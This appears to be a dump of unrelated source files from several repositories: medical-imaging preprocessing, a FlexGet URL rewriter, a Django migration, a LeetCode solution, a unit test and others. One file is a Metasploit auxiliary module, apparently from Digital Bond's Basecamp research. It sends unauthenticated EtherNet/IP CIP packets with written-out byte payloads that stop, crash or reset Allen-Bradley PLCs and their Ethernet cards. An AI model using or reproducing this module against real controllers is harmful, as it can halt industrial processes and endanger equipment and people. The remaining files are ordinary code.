# Define the path of the modality to normalize
path_dce = 'DCE_reg_bspline'
# Define the path of the ground-truth for the prostate
path_gt = ['GT_inv/prostate', 'GT_inv/pz', 'GT_inv/cg', 'GT_inv/cap']
# Define the label of the ground-truth which will be provided
label_gt = ['prostate', 'pz', 'cg', 'cap']
# Define the path to the normalization parameters
path_norm = '/data/prostate/pre-processing/lemaitre-2016-nov/norm-objects'
# Define the path to store the extracted enhancement signals
# (comment originally said "Tofts" -- the data saved below are ESE features)
path_store = '/data/prostate/extraction/mp-mri-prostate/ese-dce'
# Generate the different paths to be treated later
path_patients_list_dce = []
path_patients_list_gt = []
# One entry per patient directory found under path_patients
id_patient_list = [name for name in os.listdir(path_patients)
                   if os.path.isdir(os.path.join(path_patients, name))]
for id_patient in id_patient_list:
    # Append for the DCE data
    path_patients_list_dce.append(os.path.join(path_patients, id_patient,
                                               path_dce))
    # Append for the GT data - Note that we need a list of gt paths
    path_patients_list_gt.append([os.path.join(path_patients, id_patient, gt)
                                  for gt in path_gt])
# Load all the data once. Splitting into training and testing will be done at
# the cross-validation time
for idx_pat in range(len(id_patient_list)):
    print 'Read patient {}'.format(id_patient_list[idx_pat])
    # Load the testing data that correspond to the index of the LOPO
    # Create the object for the DCE
    dce_mod = DCEModality()
    dce_mod.read_data_from_path(path_patients_list_dce[idx_pat])
    print 'Read the DCE data for the current patient ...'
    # Create the corresponding ground-truth
    gt_mod = GTModality()
    gt_mod.read_data_from_path(label_gt,
                               path_patients_list_gt[idx_pat])
    print 'Read the GT data for the current patient ...'
    # Load the appropriate normalization object; the pickle name is derived
    # from the patient directory name, e.g. "Patient 1" -> "patient_1_norm.p"
    filename_norm = (id_patient_list[idx_pat].lower().replace(' ', '_') +
                     '_norm.p')
    dce_norm = StandardTimeNormalization.load_from_pickles(
        os.path.join(path_norm, filename_norm))
    dce_mod = dce_norm.normalize(dce_mod)
    # Create the object to extract data
    # NOTE(review): a fresh DCEModality() is passed to the constructor while
    # the normalized dce_mod is what transform() receives below -- confirm the
    # constructor argument is only used as a modality type tag.
    dce_ese = EnhancementSignalExtraction(DCEModality())
    # Extract the enhancement signals inside the prostate ground-truth
    data = dce_ese.transform(dce_mod, gt_mod, label_gt[0])
    # Check that the path is existing
    if not os.path.exists(path_store):
        os.makedirs(path_store)
    # NOTE(review): the '_ese_' + '_dce.npy' concatenation yields a double
    # underscore ("..._ese__dce.npy") -- confirm downstream readers expect it.
    pat_chg = (id_patient_list[idx_pat].lower().replace(' ', '_') +
               '_ese_' + '_dce.npy')
    filename = os.path.join(path_store, pat_chg)
    np.save(filename, data)
| mit | Python | |
c7987bde28992ef0ae8cae9fca500730b2fcea15 | Add url rewriter for eztv | jawilson/Flexget,crawln45/Flexget,ZefQ/Flexget,crawln45/Flexget,crawln45/Flexget,grrr2/Flexget,poulpito/Flexget,tobinjt/Flexget,ianstalk/Flexget,dsemi/Flexget,Flexget/Flexget,Flexget/Flexget,OmgOhnoes/Flexget,qk4l/Flexget,jacobmetrick/Flexget,JorisDeRieck/Flexget,ZefQ/Flexget,tsnoam/Flexget,Danfocus/Flexget,antivirtel/Flexget,voriux/Flexget,thalamus/Flexget,tobinjt/Flexget,thalamus/Flexget,ianstalk/Flexget,antivirtel/Flexget,spencerjanssen/Flexget,xfouloux/Flexget,qvazzler/Flexget,Pretagonist/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,offbyone/Flexget,X-dark/Flexget,vfrc2/Flexget,xfouloux/Flexget,spencerjanssen/Flexget,JorisDeRieck/Flexget,thalamus/Flexget,patsissons/Flexget,ianstalk/Flexget,tsnoam/Flexget,OmgOhnoes/Flexget,cvium/Flexget,lildadou/Flexget,antivirtel/Flexget,crawln45/Flexget,lildadou/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,Flexget/Flexget,qvazzler/Flexget,ibrahimkarahan/Flexget,cvium/Flexget,drwyrm/Flexget,offbyone/Flexget,sean797/Flexget,dsemi/Flexget,camon/Flexget,jawilson/Flexget,lildadou/Flexget,oxc/Flexget,gazpachoking/Flexget,jacobmetrick/Flexget,malkavi/Flexget,grrr2/Flexget,cvium/Flexget,jawilson/Flexget,malkavi/Flexget,patsissons/Flexget,Pretagonist/Flexget,tvcsantos/Flexget,camon/Flexget,sean797/Flexget,poulpito/Flexget,ZefQ/Flexget,dsemi/Flexget,spencerjanssen/Flexget,jawilson/Flexget,voriux/Flexget,LynxyssCZ/Flexget,OmgOhnoes/Flexget,qk4l/Flexget,ratoaq2/Flexget,tobinjt/Flexget,X-dark/Flexget,drwyrm/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,oxc/Flexget,ibrahimkarahan/Flexget,tvcsantos/Flexget,vfrc2/Flexget,poulpito/Flexget,Pretagonist/Flexget,ibrahimkarahan/Flexget,qk4l/Flexget,ratoaq2/Flexget,patsissons/Flexget,gazpachoking/Flexget,tsnoam/Flexget,v17al/Flexget,oxc/Flexget,v17al/Flexget,X-dark/Flexget,tarzasai/Flexget,tarzasai/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,LynxyssCZ/Flexget,sean797/Flexget,xfouloux/Flexget,malkavi/Flexget,Danfoc
us/Flexget,Danfocus/Flexget,Danfocus/Flexget,v17al/Flexget,grrr2/Flexget,tarzasai/Flexget,tobinjt/Flexget,vfrc2/Flexget,drwyrm/Flexget,Flexget/Flexget | flexget/plugins/urlrewrite_eztv.py | flexget/plugins/urlrewrite_eztv.py | from __future__ import unicode_literals, division, absolute_import
import re
import logging
from urlparse import urlparse, urlunparse
from requests import RequestException
from flexget import plugin
from flexget.event import event
from flexget.plugins.plugin_urlrewriting import UrlRewritingError
from flexget.utils import requests
from flexget.utils.soup import get_soup
log = logging.getLogger('eztv')
# Known EzTV mirrors as (scheme, netloc) pairs; url_rewrite tries them in
# order until one answers.
EZTV_MIRRORS = [
    ('http', 'eztv.it'),
    ('https', 'eztv-proxy.net'),
    ('http', 'eztv.come.in')]
class UrlRewriteEztv(object):
    """Eztv url rewriter.

    Rewrites eztv.it episode-page urls into direct torrent links, falling
    back through EZTV_MIRRORS when a mirror is unreachable.
    """

    def url_rewritable(self, task, entry):
        """Return True for urls hosted on eztv.it."""
        return urlparse(entry['url']).netloc == 'eztv.it'

    def url_rewrite(self, task, entry):
        """Replace entry['url'] with the torrent links scraped from eztv.

        Raises UrlRewritingError when no mirror responds or no download
        link can be found on the page.
        """
        url = entry['url']
        # Fix: 'page' must be defined even if every mirror fails, otherwise
        # the check below raised NameError instead of UrlRewritingError.
        page = None
        for scheme, netloc in EZTV_MIRRORS:
            try:
                # Keep the original path/query, swap in the mirror's
                # scheme and host.
                _, _, path, params, query, fragment = urlparse(url)
                url = urlunparse((scheme, netloc, path, params, query, fragment))
                page = requests.get(url).content
            except RequestException:
                log.debug('Eztv mirror `%s` seems to be down', url)
                continue
            break

        if not page:
            raise UrlRewritingError('No mirrors found for url %s' % entry['url'])

        log.debug('Eztv mirror `%s` chosen', url)
        try:
            soup = get_soup(page)
            # Fix: find() returns only the first <a> tag (and iterating a
            # single Tag walks its children) -- find_all() collects every
            # download_N mirror link as intended.
            mirrors = soup.find_all('a', attrs={'class': re.compile(r'download_\d')})
            if not mirrors:
                raise UrlRewritingError('Unable to locate download link from url %s'
                                        % url)
            entry['urls'] = [m.get('href') for m in mirrors]
            entry['url'] = mirrors[0].get('href')
        except UrlRewritingError:
            # Don't wrap our own error in another UrlRewritingError.
            raise
        except Exception as e:
            raise UrlRewritingError(e)
@event('plugin.register')
def register_plugin():
    # Register under the 'urlrewriter' group so the urlrewriting plugin
    # discovers this rewriter (plugin API v2).
    plugin.register(UrlRewriteEztv, 'eztv', groups=['urlrewriter'], api_ver=2)
| mit | Python | |
c60b152573ccfe01997f3d970968180ac82af8ba | Add forgotten migration | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/funding_stripe/migrations/0014_auto_20190916_1645.py | bluebottle/funding_stripe/migrations/0014_auto_20190916_1645.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-09-16 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: allow
    # StripePayoutAccount.document_type to be left blank.

    # Must be applied after the previous funding_stripe migration.
    dependencies = [
        ('funding_stripe', '0013_auto_20190913_1458'),
    ]

    operations = [
        migrations.AlterField(
            model_name='stripepayoutaccount',
            name='document_type',
            # blank=True makes the field optional in forms/validation.
            field=models.CharField(blank=True, max_length=20),
        ),
    ]
| bsd-3-clause | Python | |
7d6932a07caed84c424f62ab8d980fde7eddeaed | Create lc375.py | FiveEye/ProblemSet,FiveEye/ProblemSet | LeetCode/lc375.py | LeetCode/lc375.py | class Solution(object):
def getMoneyAmount(self, n):
"""
:type n: int
:rtype: int
"""
dp = [[0 for x in range(n+1)] for y in range(n+1)]
for i in range(2,n+1):
for x in range(n):
if x + i > n:
break
dp[x][x+i] = x+1 + dp[x+1][x+i]
for j in range(x+1, x+i):
tmp = max(dp[x][j], dp[j+1][x+i]) + (j+1)
if tmp < dp[x][x+i]:
dp[x][x+i] = tmp
print(dp[0])
return dp[0][n]
| mit | Python | |
74d718b19ec49c0ca4c724533af1ec725003adef | remove emtry transtion of region | affan2/django-cities-light,affan2/django-cities-light | cities_light/management/commands/region_missing_translations.py | cities_light/management/commands/region_missing_translations.py | from django.core.management.base import BaseCommand
class Command(BaseCommand):
    """Backfill a placeholder translation for regions that have none."""

    def handle(self, *args, **options):
        # Local import, as in the original module -- presumably to defer
        # model loading until the command actually runs (TODO confirm).
        from cities_light import Region

        placeholder = "no region name given"
        for region in Region.published.all():
            if region.translations.all():
                continue
            translation = region.translate(region.default_language)
            translation.name = placeholder
            translation.display_name = placeholder
            translation.save()
8578d221498eee26be8cbd27849ac9a4fbfc27a5 | Create ethernetip-multi.py | digitalbond/Basecamp,digitalbond/Basecamp | ethernetip-multi.py | ethernetip-multi.py | require 'msf/core'
class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp
	include Rex::Socket::Tcp

	# Standard Metasploit module metadata.
	def initialize(info={})
		super(update_info(info,
			'Name'           => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP commands',
			'Description'    => %q{
				The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
				implements the protocol. This module implements the CPU STOP command, as well as
				the ability to crash the Ethernet card in an affected device.
			},
			'Author'         => ['Ruben Santamarta <ruben@reversemode.com>',
						'K. Reid Wightman <wightman@digitalbond.com>'],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'DisclosureDate'=> 'Jan 19 2012'))
		register_options(
			[
				Opt::RHOST('127.0.0.1'),
				Opt::RPORT(44818), # default EtherNet/IP TCP port
				# NOTE(review): run() also accepts RESETETHER, which this
				# description string omits -- keep the two in sync.
				OptString.new('ATTACK', [true, "The attack to use. Valid values: STOPCPU, CRASHCPU, CRASHETHER", "STOPCPU"])
			], self.class
		)
	end

	# Wrap *payload* in an EtherNet/IP encapsulation header
	# (command 0x6f, "Send RR Data") using the negotiated *sessionid*
	# and write it to the open socket. Returns nil on network error.
	def forgepacket(sessionid, payload)
		packet = ""
		packet += "\x6f\x00" # command: Send request/reply data
		packet += [payload.size - 0x10].pack("v") # encap length (2 bytes)
		packet += [sessionid].pack("N") # session identifier (4 bytes)
		packet += payload #payload part
		begin
			sock.put(packet)
		rescue ::Interrupt
			print_error("Interrupt during payload")
			raise $!
		rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
			print_error("Network error during payload")
			return nil
		end
	end

	# Send ENCAP_CMD_REGISTERSESSION (0x65) and return the session id the
	# device hands back, or nil on network error.
	def reqsession
		packet = ""
		packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)
		packet += "\x04\x00" # encaph_length (2 bytes)
		packet += "\x00\x00\x00\x00" # session identifier (4 bytes)
		packet += "\x00\x00\x00\x00" # status code (4 bytes)
		packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)
		packet += "\x00\x00\x00\x00" # options flags (4 bytes)
		packet += "\x01\x00" # proto (2 bytes)
		packet += "\x00\x00" # flags (2 bytes)
		begin
			sock.put(packet)
			response = sock.get_once(-1,8)
			# Session id lives at offset 4 of the reply.
			session_id = response[4..8].unpack("N")[0] # bare minimum of parsing done
			print_status("Got session id: 0x0"+session_id.to_s(16))
		rescue ::Interrupt
			print_error("Interrupt during session negotation")
			raise $!
		rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
			print_error("Network error during session negotiation")
			return nil
		end
		return session_id
	end

	# Close the TCP connection when the module finishes.
	def cleanup
		disconnect
	end

	# Pick the raw CIP payload for the selected ATTACK, register a session,
	# then fire the payload. The byte strings below are protocol data and
	# must not be altered.
	def run
		payload = ""
		attack = datastore["ATTACK"]
		case attack
		when "STOPCPU"
			payload = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #encapsulation -[payload.size-0x10]-
				"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + #packet1
				"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + #packet2
				"\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00" #packet3
		when "CRASHCPU"
			payload = "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" +
				"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" +
				"\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"
		when "CRASHETHER"
			payload = "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" +
				"\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"
		when "RESETETHER"
			payload = "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" +
				"\x05\x03\x20\x01\x24\x01\x30\x03"
		else
			print_error("Invalid attack option. Choose STOPCPU, CRASHCPU, CRASHETHER, or RESETETHER")
			return
		end
		connect
		sid = reqsession
		if sid
			forgepacket(sid, payload)
		end
	end
end
| mit | Python | |
e20002febd14a2f6d31b43ee85d57bfa26c745e5 | test game/board.py | ciappi/Yaranullin | yaranullin/game/tests/board.py | yaranullin/game/tests/board.py | # yaranullin/game/tests/board.py
#
# Copyright (c) 2012 Marco Scopesi <marco.scopesi@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import unittest
import sys
# When this module is executed directly (not via a test runner), make the
# repository root importable so the absolute import below resolves.
if __name__ == '__main__':
    sys.path.insert(0, ".")
from yaranullin.game.board import Board
class TestBoard(unittest.TestCase):

    """Unit tests for yaranullin.game.board.Board pawn management."""

    def setUp(self):
        self.size = (100, 200)
        self.name = 'Test dungeon'
        self.board = Board(self.name, self.size)

    def test_create_pawn(self):
        """A created pawn is registered in pawns and initiatives."""
        pos = 3, 4
        size = 5, 6
        pawn = self.board.create_pawn('Dragon', 35, pos, size)
        self.assertIn(pawn.name, self.board.pawns)
        self.assertIs(pawn, self.board.pawns[pawn.name])
        self.assertIn(pawn, self.board.initiatives)

    def test_del_pawn(self):
        """Deleting a pawn removes it from pawns and initiatives.

        Fix: this method was named 'del_pawn', so unittest discovery never
        ran it; it also indexed self.board.pawns[pawn.name] after deletion,
        which would raise KeyError rather than assert anything.
        """
        pos = 3, 4
        size = 5, 6
        self.board.create_pawn('Dragon', 35, pos, size)
        pawn = self.board.del_pawn('Dragon')
        self.assertNotIn(pawn.name, self.board.pawns)
        self.assertNotIn(pawn, self.board.initiatives)
# Run the tests when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| isc | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.